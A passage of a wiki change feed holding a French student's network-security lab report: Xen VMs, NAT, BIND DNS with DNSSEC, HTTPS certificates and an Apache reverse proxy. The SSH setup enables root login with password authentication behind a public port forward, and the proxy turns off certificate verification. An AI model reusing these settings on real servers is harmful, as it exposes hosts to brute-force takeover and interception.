&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type slave;&lt;br /&gt;
    file &amp;quot;/var/lib/bind/db.msalhi.online&amp;quot;;&lt;br /&gt;
    masters { 192.168.20.2; };  # IP de Moon&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe6f:f547&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Polytech_logo.png&amp;diff=12003</id>
		<title>Fichier:Polytech logo.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Polytech_logo.png&amp;diff=12003"/>
		<updated>2026-02-02T09:35:24Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Poly&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12002</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12002"/>
		<updated>2026-02-02T09:14:21Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : Page créée avec « &amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;  '''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt; Sécurité Système/Réseau'''  '''Année Universitaire 2025-2026'''  &amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;  image  &amp;lt;/div&amp;gt; '''Étudiant: Mohamed SALHI'''  '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''  '''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''  '''École Polytechnique Universitaire de Lille'''  2026-02-02   &amp;lt;/div&amp;gt; &amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt; = Introduction =  Ce rapport doc... »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt;&lt;br /&gt;
Sécurité Système/Réseau'''&lt;br /&gt;
&lt;br /&gt;
'''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''&lt;br /&gt;
&lt;br /&gt;
'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''École Polytechnique Universitaire de Lille'''&lt;br /&gt;
&lt;br /&gt;
2026-02-02&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { 192.168.20.1; };  # Solstice comme secondaire&lt;br /&gt;
    also-notify { 192.168.20.1; };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL    86400&lt;br /&gt;
@       IN      SOA     ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
                        2026020203      ; Serial&lt;br /&gt;
                        3600            ; Refresh&lt;br /&gt;
                        1800            ; Retry&lt;br /&gt;
                        604800          ; Expire&lt;br /&gt;
                        86400 )         ; Minimum TTL&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN      NS      ns1.msalhi.online.&lt;br /&gt;
@       IN      NS      ns2.msalhi.online.&lt;br /&gt;
&lt;br /&gt;
; Glue records&lt;br /&gt;
ns1     IN      AAAA    2001:660:4401:60a0:216:3eff:fe6f:f547&lt;br /&gt;
